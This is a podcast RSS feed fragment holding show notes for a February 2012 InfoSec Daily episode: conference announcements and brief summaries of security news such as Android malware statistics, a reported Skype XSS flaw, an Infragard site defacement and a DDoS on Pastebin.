	2. If you IP is included in the assessment scope (internal NVA/PT), make sure to remove any &#160;findings from the report that relate to your box.
	3. After a pentest, make sure you clean up after yourself (i.e. do not leave the systems worse than you found them).
	4. If you tell the customer you will have their report on a particular date, then you better make every effort to make that deadline!
Source: https://community.rapid7.com/community/metasploit/blog/2012/02/22/metasploit-42-released
	Since our last release in October, we&#039;ve added 54 new exploits, 66 new auxiliary modules, 43 new post-exploitation modules, and 18 new payloads &#8212; that clocks in at just about 1.5 new modules per day since version 4.1. Clearly, this kind of volume is way too much to detail in a single update blog post. Of course, you could just dive in and download the latest version to get started. In the meantime, here are the highlights for this latest release of Metasploit.
IPv6 Coverage
	Virtualization as an Attack Vector
	New Resource Scripts
	The Ghost of Updates Past
	Details and Availability
	 
	For detailed information on this release, check out Jcran&#039;s most excellent release notes. To start playing with the shiny new Metasploit 4.2, download your free copy now.
	&#8230;.
	Source: https://community.rapid7.com/community/metasploit/blog/2012/02/21/metasploit-javascript-keylogger
	Rarely does a week go by without a friend or family member getting their login credentials compromised, then reused for malicious purposes. My wife is always on the lookout on Facebook, warning relatives and friends to change their passwords. Many [...]</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, and Dr. Bonez.</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 603 &#8211; Irish Data, Certificate Authorities, 10.8 million, Skype, OH Infragard &amp; Pastebin</title>
		<link>http://www.isdpodcast.com/episode-603-irish-data-certificate-authorities-10-8-million-skype-oh-infragard-pastebin</link>
		<comments>http://www.isdpodcast.com/episode-603-irish-data-certificate-authorities-10-8-million-skype-oh-infragard-pastebin#comments</comments>
		<pubDate>Sat, 25 Feb 2012 01:56:37 +0000</pubDate>
		<dc:creator>rick.hayes</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=3548</guid>
		<description><![CDATA[InfoSec Daily Podcast Episode 603 for February 24, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Karthik Rangarajan, Geordy Rostad, and Dr. Bonez. &#160; Announcements: Social Engineering Training When: March 5-9, 2012 Where: Seattle, Washington When: July 21-24, 2012 Where: Black Hat Vegas When: August 20-24, 2012 Where: &#160;Bristol, UK When: &#160;November 12-16, [...]]]></description>
			<content:encoded><![CDATA[<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Daily Podcast Episode 603 for February 24, 2012. &nbsp;</span><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Karthik Rangarajan, Geordy Rostad, and Dr. Bonez.</span><br />
	&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Announcements:</span></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Social Engineering Training</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: March 5-9, 2012<br class="kix-line-break" /><br />
	Where: Seattle, Washington</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: July 21-24, 2012<br class="kix-line-break" /><br />
	Where: Black Hat Vegas</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: August 20-24, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: &nbsp;Bristol, UK</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;November 12-16, 2012<br class="kix-line-break" /><br />
	Where: &nbsp;Columbia, MD </span><br />
	<a href="http://www.social-engineer.com/social-engineer-training"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.com/social-engineer-training</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Southwest</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: March 30-April 1</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Austin, TX</span><br />
	<a href="http://www.infosecsouthwest.com/"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.Infosecsouthwest.com</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Linuxfest Northwest 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Saturday, April 28th-29th, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Bellingham Technical College &#8211; Bellingham, WA</span><br />
	<a href="http://www.linuxfestnorthwest.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.linuxfestnorthwest.org/</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">AIDE 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 21-25, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: MU Forensic Science Center</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Huntington, West Virginia </span><br />
	<a href="http://aide.marshall.edu/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://aide.marshall.edu</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open! &nbsp;If you have some Anti-Forensics talks, that would be awesome.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">LayerOne 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 26-27, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Clarion Hotel &#8211; Anaheim, CA</span><br />
	<a href="http://www.layerone.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.layerone.org</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span><br />
	&nbsp;</p>
<h5 dir="ltr"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Security 504: Hacker Techniques, Exploits &amp; Incident Handling &#8211; Matt Romanek</span></h5>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: June 20 &#8211; 27, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Courtyard Seattle Federal Way, WA</span><a href="http://www.sans.org/mentor/details.php?nid=28014"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.sans.org/mentor/details.php?nid=28014</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Inside and Out of the Social-Engineer Toolkit (SET)</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: July 21 &#8211; 22, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: July 23 &#8211; 24, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Black Hat Vegas</span><br />
	<a href="http://blackhat.com/html/bh-us-12/training/courses/bh-us-12-training_social_engineer_toolkit.html"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://blackhat.com/html/bh-us-12/training/courses/bh-us-12-training_social_engineer_toolkit.html</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Defcon 20</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: July 26-29, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Rio Hotel and Casino &#8211; Las Vegas, NV</span><br />
	<a href="http://defcon.org/"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://defcon.org/</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP &amp; Room reservations now open!</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">DerbyCon 2012 &#8211; The &ldquo;Deuce&rdquo; Reunion</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;September 27-30, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Louisville, KY</span><br />
	<a href="http://www.derbycon.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.derbycon.com</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Thanks to everyone that has purchased products from Amazon through the affiliate program. &nbsp;If you&rsquo;re not familiar with the affiliate program, simply go to</span><a href="../"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.isdpodcast.com</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> and locate the Affiliate Program link on the right hand side.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><div class="awshortcode-carrousel align&amp;quot;right&amp;quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div></span><br />
	&nbsp;</p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Stories</span></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><a href="http://www.siliconrepublic.com/strategy/item/25941-high-numbers-of-irish-firms"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.siliconrepublic.com/strategy/item/25941-high-numbers-of-irish-firms</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Almost two-thirds of Irish businesses in a survey said staff members have sent confidential business information over email.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Of the total 63pc, 35pc had sent out proprietary company details by email, and 28pc had sent customers&rsquo; financial or identity information the same way.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Almost one in four respondents (23pc) said they had to discipline an employee for sending confidential business information over email, and in 4pc of cases such an incident led to dismissal.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Some 200 Irish IT executives were polled for the survey carried out by iReach on behalf of the IT distributor DataSolutions. The research was split into two parts, covering intrusion prevention from external threats and data loss caused by the accidental or intentional actions of internal personnel.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The survey also suggests that as many as 14,000 Irish businesses have had their data compromised. The figure was arrived at by using the total number of active Irish enterprises as registered with the Central Statistics Office and the survey finding that 7pc of respondents admitted their data had been compromised.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">In this case, respondents were asked the question: &ldquo;There have been a lot of high-profile hacks recently &ndash; has your data ever been compromised or lost?&rdquo;</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><a href="http://www.darkreading.com/authentication/167901072/security/encryption/232601373/survey-post-it-notes-spreadsheets-used-to-manage-digital-certificates.html"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.darkreading.com/authentication/167901072/security/encryption/232601373/survey-post-it-notes-spreadsheets-used-to-manage-digital-certificates.html</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Certificate authorities (CA&#39;s) are still reeling from the wave of hacks against them over the past year. And it turns out their most of their customers are struggling to keep on top of their SSL certificates despite the increased threats. A new survey found that 54 percent of organizations say they don&#39;t have a complete or correct accounting of their SSL certificates, and 44 percent manage their lifecycle manually &#8212; with Post-It notes and spreadsheets.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Michael Osterman, president of Osterman Research, which was commissioned by key management vendor Venafi to conduct the survey, says he was shocked by the lack of a sense of urgency about properly managing and protecting digital certificates. &quot;Organizations are already behind in properly managing their certificate population via manual policies. With the expected growth in certificates, we anticipate more incursions, certificate breaches and other risks than we saw in 2011,&quot; he said in a statement.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The survey of 174 IT and IT security pros had several red flags about digital certificate management. Some 72 percent of organizations don&#39;t have an automated process in place in case their CA is hacked, so they can&#39;t automatically replace digital certificates. The risk there, of course, is a website or application outage in the event of an expired certificate.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Many (46 percent) can&#39;t even generate a report on digital certificates that are about to expire; it&#39;s a manual process to track certs that are reaching their expiration date.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://www.net-security.org/malware_news.php?id=2013"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.net-security.org/malware_news.php?id=2013</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">From 2010 to 2011, Android officially overtook Symbian as the most targeted mobile platform in the world by cyber criminals, according to NQ Mobile.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">In 2011, newer and more advanced forms of malware have successfully infected an estimated 10.8 million Android devices worldwide. This is expected to increase throughout 2012.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;Smartphones and tablets are finally delivering consumers with these converged and connected experiences we&#39;ve been promised for so long,&quot; says Omar Khan, Co-CEO NQ Mobile. &quot;But this is a double edged sword: as smart device usage becomes more sophisticated, so too are cyber criminals&#39; methods of attacking consumers&#39; personal information.&quot;</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Key findings for 2011:</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Malware threats to Android devices increased 1880 percent from January to December 2011</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">More than 10.8 million Android devices worldwide were infected by malware</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The top countries with infected Android devices were China, India, the United States of America, Russia and the United Kingdom.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><a href="http://secday.blogspot.in/2012/02/skype-cross-site-vulnerabilities.html"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://secday.blogspot.in/2012/02/skype-cross-site-vulnerabilities.html</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Skype is a proprietary voice-over-Internet Protocol service and software application originally created by Niklas Zennstr&ouml;m, and owned by Microsoft since 2011.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The service allows users to communicate with peers by voice, video, and instant messaging over the Internet. Phone calls may be placed to recipients on the traditional telephone networks. Calls to other users within the Skype service are free of charge, while calls to landline telephones and mobile phones are charged via a debit-based user account system. Skype has also become popular for its additional features, including file transfer, and videoconferencing. Competitors include SIP and H.323-based services, such as Empathy, Linphone, Ekiga as well as the Google Talk service.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Skype has 663 million registered users as of September 2011. The network is operated by Microsoft, which has its Skype division headquarters in Luxembourg. Most of the development team and 44% of the overall employees of the division are situated in the offices of Tallinn and Tartu, Estonia.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">I reported Cross Site Scripting Vulnerabilities on skype official website, i will update this post and share more information when they fix there problem.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><a href="http://www.ctv.ca/CTVNews/SciTech/20120224/hackers-anonymous-FBI-20120224"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.ctv.ca/CTVNews/SciTech/20120224/hackers-anonymous-FBI-20120224</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Hackers claiming allegiance to the loose-knit Anonymous movement have claimed responsibility for vandalizing an Ohio FBI partner website, replacing its homepage with the video for rap hit &quot;Gangsta&#39;s Paradise.&quot;</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The hackers said Friday that they were responsible for defacing the website of the Dayton, Ohio-based chapter of Infragard, a public-private partnership for critical infrastructure protection sponsored by the FBI.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The Ohio site was replaced with the video for Coolio&#39;s 1995 rap hit and a profane message attacking Infragard as a &quot;sinister alliance&quot; between corporations and law enforcement.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Anonymous has promised weekly hacks as the amorphous group continues its campaign against law enforcement worldwide.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The FBI did not immediately return a call seeking comment.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://www.pcworld.com/businesscenter/article/250580/hacker_billboard_pastebin_struggles_with_ddos_attacks.html"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.pcworld.com/businesscenter/article/250580/hacker_billboard_pastebin_struggles_with_ddos_attacks.html</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Pastebin, a website favored by hackers to publicly post sensitive stolen data, has been battling an ongoing distributed denial-of-service (DDOS) attack aimed at disabling the site, according to its administrators.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The latest attack started on Wednesday, according to a Pastebin post on its website. Pastebin said it blocked 4,000 malicious IP addresses initially. But the attack grew. Pastebin said in Twitter messages that the number of attacking computers increased to 9,000, then to 12,000, then to 17,000 and up to 20,000.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;This number is growing by the minute,&quot; Pastebin wrote. By Thursday, Pastebin said some 22,000 computers were attacking it.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;These IP&#39;s are most likely from innocent people who have no clue that their computer is being used for this purpose,&quot; Pastebin said. &quot;It is highly recommended that you always have up-to-date antivirus software installed and a good firewall active.&quot;</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The website said it plans to publish a list of the attack IP addresses so people can check to see if their computer is infected with the botnet code.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span><br />
	&nbsp;</p>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-603-irish-data-certificate-authorities-10-8-million-skype-oh-infragard-pastebin/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/3548/0/infosec-daily-podcast-episode-603.mp3" length="19399662" type="audio/mpeg" />
		<itunes:duration>0:40:22</itunes:duration>
		<itunes:subtitle>InfoSec Daily Podcast Episode 603 for February 24, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Karthik Rangarajan, Geordy Rostad, and Dr. Bonez.
	&#160;
Announcements:
Social Engineering Training
	When: March 5-9, 2012[...]</itunes:subtitle>
		<itunes:summary>InfoSec Daily Podcast Episode 603 for February 24, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Karthik Rangarajan, Geordy Rostad, and Dr. Bonez.
	&#160;
Announcements:
Social Engineering Training
	When: March 5-9, 2012
	Where: Seattle, Washington
	When: July 21-24, 2012
	Where: Black Hat Vegas
